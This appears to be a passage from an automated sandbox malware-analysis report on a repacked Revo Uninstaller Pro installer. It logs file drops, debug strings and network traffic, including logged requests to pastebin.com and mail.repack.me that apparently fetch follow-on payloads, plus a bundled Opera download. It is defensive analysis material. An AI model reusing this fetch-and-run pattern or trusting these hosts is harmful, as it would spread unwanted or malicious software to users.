      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovenian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\spanish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\swedish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\thai.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\traditionalchinese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\turkish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\ukrainian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\vietnamese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Revo Uninstaller ProJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209115408145.log
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209115410771.log
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txtJump to behavior
      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 194.87.189.43:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.4:49824 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.38:443 -> 192.168.2.4:49849 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.39:443 -> 192.168.2.4:49850 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.125.189:443 -> 192.168.2.4:49851 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.4:49857 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.36:443 -> 192.168.2.4:49858 version: TLS 1.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PACK.EXE, 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp, PACK.EXE, 00000010.00000003.2196303250.0000000004E01000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2194996794.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000000.2193337281.0000000001002000.00000002.00000001.01000000.00000012.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdbU source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdbO source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\x64\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000005140000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.00000000033A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoUninProPort\Release\RevoUPPort.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: installer_lib.dll.pdb source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: installer_lib.dll.pdb@ source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RUExt\build\x86\Release\RUExt\RUExt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb2 source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\x64\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\ognian\source\repos\revoflt\Release\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,16_2_00FDA2DF
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,16_2_00FEAFB9
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_004069FF FindFirstFileW,FindClose,26_2_004069FF
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,26_2_00405DAE
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00402930 FindFirstFileW,26_2_00402930
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\Jump to behavior

      Networking

      barindex
      Source: unknownDNS query: name: pastebin.com
      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /raw/vkwZzU9B HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: pastebin.comConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /tsjtmfdm.pkg HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: mail.repack.meConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: net.geo.opera.comConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /me/ HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: autoupdate.opera.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /api/v2/features?country=US&language=en-GB&uuid=a6c287cc-47e5-4bf0-9dac-fbaf9040d09e&product=&channel=Stable&version=115.0.5322.77 HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: features.opera-api2.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=cd9f81c6-729a-4d95-ac71-1ebba75bfc7b HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: download.opera.comCache-Control: no-cache
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: c. Facebook Messenger: A messaging service provided by Facebook, Inc., Meta Platforms Ireland Ltd. or related companies, depending on where you are accessing their services. Terms of use are available at https://www.facebook.com/legal/terms; and equals www.facebook.com (Facebook)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Googlehttps://www.bing.com/search?q=https://www.google.com/search?q=https://search.yahoo.com/search?p=Yahoohttps://duckduckgo.com/?q=DuckDuckGoSelectedEngineGeneral\WebSearchURL` equals www.yahoo.com (Yahoo)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MjViewTypeSort by column\RegBackup\Daily\\Steam\steam.exe--uninstall-app-id=Sort type64Microsoft .NETUpdate for Windows--profile-RedistMicrosoft Web DeployMicrosoft Visual C++Microsoft SQL ServerMicrosoft System CLRLast Full Backup/XOpenJDKURLInfoAbout /in "%s"\RevoAppBar.exe/I(*.exe;*.com;*.msi)|*.exe;*.com;*.msi|(*.*)|*.*|ModifyPathI\data\cachedata.dat\data\OLDcachedata.dathttps://www.facebook.com/pages/Revo-Uninstaller/53526911789\data\Prevcachedata.datOpen-ShellSOFTWARE\Microsoft\Installer\Products\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\ProductIconInstaller\Products\PotPlayerctor.dllSlowInfoCacheantamedia hotspotInstallDateSystemComponent\Installer\UserData\MsiExec.exe /X%02d.%02d.%dPublisherDisplayIconInstallLocationParentKeyName\InstallPropertiesHelpLinkCommentsSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\WindowsInstallerSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\\Products\cachedata.datEstimatedSizeMsiExec.exe\data\' AND RDN LIKE '' AND RPVer LIKE '%d.%dSELECT * FROM ILogs WHERE RKey=' /i /x /I /XQuietUninstallString"%s" /S %s%s /quiet%s /qn\contrast-black\.scale-400%s /S_contrast-blackx 64x 86.targetsize-256UninstallSection%d64bit32bitx-64x-86(x64 edition)(x86 edition)64 bit32 bitMicrosoft Edge WebView2 Runtimex64 editionx86 edition equals www.facebook.com (Facebook)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: ViewType\RegBackup\Daily\\Steam\steam.exe64Sort typeSort by columnMicrosoft .NETRedist--profile---uninstall-app-id=Microsoft Web DeployMicrosoft System CLRMicrosoft SQL ServerUpdate for WindowsLast Full BackupURLInfoAboutOpenJDKMicrosoft Visual C++ /in "%s"(*.exe;*.com;*.msi)|*.exe;*.com;*.msi|(*.*)|*.*|/I/XModifyPath\data\OLDcachedata.dat\data\cachedata.dat\RevoAppBar.exe\data\Prevcachedata.dathttps://www.facebook.com/pages/Revo-Uninstaller/53526911789I equals www.facebook.com (Facebook)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.bing.com/search?q=YahooGooglehttps://www.google.com/search?q=https://duckduckgo.com/?q=General\WebSearchhttps://search.yahoo.com/search?p=DuckDuckGoSelectedEngineURL` equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: pastebin.com
      Source: global trafficDNS traffic detected: DNS query: mail.repack.me
      Source: global trafficDNS traffic detected: DNS query: net.geo.opera.com
      Source: global trafficDNS traffic detected: DNS query: autoupdate.geo.opera.com
      Source: global trafficDNS traffic detected: DNS query: desktop-netinstaller-sub.osp.opera.software
      Source: global trafficDNS traffic detected: DNS query: autoupdate.opera.com
      Source: global trafficDNS traffic detected: DNS query: features.opera-api2.com
      Source: global trafficDNS traffic detected: DNS query: download.opera.com
      Source: global trafficDNS traffic detected: DNS query: download3.operacdn.com
      Source: unknownHTTP traffic detected: POST /v5/netinstaller/opera/Stable/windows/x64 HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: autoupdate.geo.opera.comContent-Length: 656Cache-Control: no-cache
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.0000000140887000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.0000000140887000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http:////file:////www.web.OS
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://autoupdate-staging.services.ams.osa/netinstallervwindows?&One
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: powershell.exe, 00000011.00000002.2327417192.00000000083CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2323270683.00000000072E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: powershell.exe, 00000011.00000002.2327417192.00000000083CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftRR
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
